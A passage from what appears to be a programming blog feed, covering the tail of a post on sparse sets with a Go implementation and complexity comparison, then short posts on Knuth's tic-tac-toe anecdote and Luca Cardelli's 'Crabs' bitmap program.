one more trick up its sleeve: the <code>dense</code> array allows an efficient implementation of set iteration. </p> <pre class=indent> iterate(): &nbsp;&nbsp;&nbsp;&nbsp;for(i=0; i&lt;n; i++) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;yield dense[i] </pre> <p class=pp> Let's compare the run times of a bit vector implementation against the sparse set: </p> <center> <table> <tr> <td><i>Operation</i> <td align=center width=10> <td align=center><i>Bit Vector</i> <td align=center width=10> <td align=center><i>Sparse set</i> </tr> <tr> <td>is-member <td> <td align=center><i>O</i>(1) <td> <td align=center><i>O</i>(1) </tr> <tr> <td>add-member <td> <td align=center><i>O</i>(1) <td> <td align=center><i>O</i>(1) </tr> <tr> <td>clear-set <td><td align=center><i>O</i>(<i>m</i>) <td><td align=center><i>O</i>(1) </tr> <tr> <td>iterate <td><td align=center><i>O</i>(<i>m</i>) <td><td align=center><i>O</i>(<i>n</i>) </tr> </table> </center> <p class=lp> The sparse set is as fast or faster than bit vectors for every operation. The only problem is the space cost: two words replace each bit. Still, there are times when the speed differences are enough to balance the added memory cost. 
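</p> <p class=pp> To see the whole trick in one place, here is a small sketch in Go. The type and method names are mine, not from Briggs and Torczon's paper, and Go's <code>make</code> zeroes the arrays anyway, so nothing below reads true garbage; the point is that <code>Clear</code> never touches <code>sparse</code>, whose stale entries are read by later membership tests and safely ignored. </p> <pre class=indent>
// Set is a sketch of the Briggs-Torczon sparse set for integers in [0, m).
type Set struct {
	dense  []int // elements in insertion order; only dense[:n] is meaningful
	sparse []int // sparse[i] is the index of i in dense, if i is a member
	n      int   // number of elements currently in the set
}

// New returns a set that can hold the integers 0 through m-1.
func New(m int) *Set {
	return &amp;Set{dense: make([]int, m), sparse: make([]int, m)}
}

// Add inserts i into the set if it is not already present. O(1).
func (s *Set) Add(i int) {
	if s.Has(i) {
		return
	}
	s.dense[s.n] = i
	s.sparse[i] = s.n
	s.n++
}

// Has reports whether i is in the set. O(1).
// If i was never added, sparse[i] may be stale, but then either
// sparse[i] >= n or dense[sparse[i]] != i, so the answer is still false.
func (s *Set) Has(i int) bool {
	j := s.sparse[i]
	return j &lt; s.n &amp;&amp; s.dense[j] == i
}

// Clear empties the set in O(1); sparse is left holding stale values.
func (s *Set) Clear() { s.n = 0 }

// Elems returns the members in insertion order, for O(n) iteration.
func (s *Set) Elems() []int { return s.dense[:s.n] }
</pre> <p class=lp> A caller might write <code>s := New(100); s.Add(5); s.Add(1); s.Add(4)</code> and then range over <code>s.Elems()</code> to visit 5, 1, 4 in insertion order, matching the example above; after <code>s.Clear()</code>, the same membership tests keep working against whatever <code>sparse</code> still holds. </p> <p class=pp>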
Briggs and Torczon point out that liveness sets used during register allocation inside a compiler are usually small and are cleared very frequently, making sparse sets the representation of choice. </p> <p class=pp> Another situation where sparse sets are the better choice is work queue-based graph traversal algorithms. Iteration over sparse sets visits elements in the order they were inserted (above, 5, 1, 4), so that new entries inserted during the iteration will be visited later in the same iteration. In contrast, iteration over bit vectors visits elements in integer order (1, 4, 5), so that new elements inserted during traversal might be missed, requiring repeated iterations. </p> <p class=pp> Returning to the original exercises, it is trivial to change the set into a vector (or matrix) by making <code>dense</code> an array of index-value pairs instead of just indices. Alternately, one might add the value to the <code>sparse</code> array or to a new array. The relative space overhead isn't as bad if you would have been storing values anyway. </p> <p class=pp> Briggs and Torczon's paper implements additional set operations and examines performance speedups from using sparse sets inside a real compiler. </p></p> Play Tic-Tac-Toe with Knuth tag:research.swtch.com,2012:research.swtch.com/tictactoe 2008-01-25T00:00:00-05:00 2008-01-25T00:00:00-05:00 The only winning move is not to play. <p><p class=lp>Section 7.1.2 of the <b><a href="http://www-cs-faculty.stanford.edu/~knuth/taocp.html#vol4">Volume 4 pre-fascicle 0A</a></b> of Donald Knuth's <i>The Art of Computer Programming</i> is titled &#8220;Boolean Evaluation.&#8221; In it, Knuth considers the construction of a set of nine boolean functions telling the correct next move in an optimal game of tic-tac-toe. In a footnote, Knuth tells this story:</p> <blockquote><p class=lp>This setup is based on an exhibit from the early 1950s at the Museum of Science and Industry in Chicago, where the author was first introduced to the magic of switching circuits. The machine in Chicago, designed by researchers at Bell Telephone Laboratories, allowed me to go first; yet I soon discovered there was no way to defeat it. Therefore I decided to move as stupidly as possible, hoping that the designers had not anticipated such bizarre behavior. In fact I allowed the machine to reach a position where it had two winning moves; and it seized <i>both</i> of them! Moving twice is of course a flagrant violation of the rules, so I had won a moral victory even though the machine had announced that I had lost.</p></blockquote> <p class=lp> That story alone is fairly amusing. But turning the page, the reader finds a quotation from Charles Babbage's <i><a href="http://onlinebooks.library.upenn.edu/webbin/book/lookupid?key=olbp36384">Passages from the Life of a Philosopher</a></i>, published in 1864:</p> <blockquote><p class=lp>I commenced an examination of a game called &#8220;tit-tat-to&#8221; ... to ascertain what number of combinations were required for all the possible variety of moves and situations. I found this to be comparatively insignificant. ... A difficulty, however, arose of a novel kind. When the automaton had to move, it might occur that there were two different moves, each equally conducive to his winning the game. ... Unless, also, some provision were made, the machine would attempt two contradictory motions.</p></blockquote> <p class=lp> The only real winning move is not to play.</p></p> Crabs, the bitmap terror! 
tag:research.swtch.com,2012:research.swtch.com/crabs 2008-01-09T00:00:00-05:00 2008-01-09T00:00:00-05:00 A destructive, pointless violation of the rules <p><p class=lp>Today, window systems seem as inevitable as hierarchical file systems, a fundamental building block of computer systems. But it wasn't always that way. This paper could only have been written in the beginning, when everything about user interfaces was up for grabs.</p> <blockquote><p class=lp>A bitmap screen is a graphic universe where windows, cursors and icons live in harmony, cooperating with each other to achieve functionality and esthetics. A lot of effort goes into making this universe consistent, the basic law being that every window is a self contained, protected world. In particular, (1) a window shall not be affected by the internal activities of another window. (2) A window shall not be affected by activities of the window system not concerning it directly, i.e. (2.1) it shall not notice being obscured (partially or totally) by other windows or obscuring (partially or totally) other windows, (2.2) it shall not see the <i>image</i> of the cursor sliding on its surface (it can only ask for its position).</p> <p class=pp> Of course it is difficult to resist the temptation to break these rules. Violations can be destructive or non-destructive, useful or pointless. Useful non-destructive violations include programs printing out an image of the screen, or magnifying part of the screen in a <i>lens</i> window. Useful destructive violations are represented by the <i>pen</i> program, which allows one to scribble on the screen. Pointless non-destructive violations include a magnet program, where a moving picture of a magnet attracts the cursor, so that one has to continuously pull away from it to keep working. The first pointless, destructive program we wrote was <i>crabs</i>.</p> </blockquote> <p class=lp>As the crabs walk over the screen, they leave gray behind, &#8220;erasing&#8221; the apps underfoot:</p> <blockquote><img src="http://research.swtch.com/crabs1.png"> </blockquote> <p class=lp> For the rest of the story, see Luca Cardelli's &#8220;<a style="font-weight: bold;" href="http://lucacardelli.name/Papers/Crabs.pdf">Crabs: the bitmap terror!</a>&#8221; (6.7MB). Additional details in &#8220;<a href="http://lucacardelli.name/Papers/Crabs%20%28History%20and%20Screen%20Dumps%29.pdf">Crabs (History and Screen Dumps)</a>&#8221; (57.1MB).</p></p>